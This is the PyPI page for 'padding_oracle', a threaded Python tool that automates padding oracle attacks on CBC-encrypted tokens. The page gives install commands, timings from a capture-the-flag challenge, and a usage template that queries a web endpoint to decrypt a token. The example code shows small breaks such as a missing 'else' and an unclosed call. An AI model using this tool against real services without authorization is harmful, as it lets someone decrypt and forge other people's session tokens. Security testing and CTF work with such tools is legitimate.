Skip to main content

Threaded padding oracle automation.

Project description

Fast threaded padding oracle attack automation script for Python 3.



pip3 install -U padding_oracle


pip3 install -U git+


Tested on [0x09] Cathub Party from EDU-CTF:

Request Threads Execution Time
1 17m 43s
4 5m 23s
16 1m 20s
64 56s


Let's say we are going to test

from padding_oracle import padding_oracle, base64_encode, base64_decode
import requests, string

sess = requests.Session() # for connection pool
url = ''

def check_decrypt(cipher: bytes):
    resp = sess.get(url, params={'token': base64_encode(cipher)})

    if 'failed' in resp.text:
        return False
    elif 'success' in resp.text:
        return True
        raise RuntimeError('unexpected behavior')

cipher = base64_decode('BASE64_ENCODED_TOKEN')
# becomes IV + block1 + block2 + ...
assert len(cipher) % 16 == 0

plaintext = padding_oracle(
    cipher, # cipher bytes
    block_size = 16,
    oracle = check_decrypt,
    num_threads = 16,
    chars = string.printable # possible plaintext chars

This package also provides PHP-like encoding/decoding functions:

from padding_oracle.encoding import (

Project details

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

padding_oracle-0.2.2.tar.gz (8.2 kB view hashes)

Uploaded source

Built Distribution

padding_oracle-0.2.2-py3-none-any.whl (10.9 kB view hashes)

Uploaded py3

Supported by

AWS AWS Cloud computing Datadog Datadog Monitoring Facebook / Instagram Facebook / Instagram PSF Sponsor Fastly Fastly CDN Google Google Object Storage and Download Analytics Huawei Huawei PSF Sponsor Microsoft Microsoft PSF Sponsor NVIDIA NVIDIA PSF Sponsor Pingdom Pingdom Monitoring Salesforce Salesforce PSF Sponsor Sentry Sentry Error logging StatusPage StatusPage Status page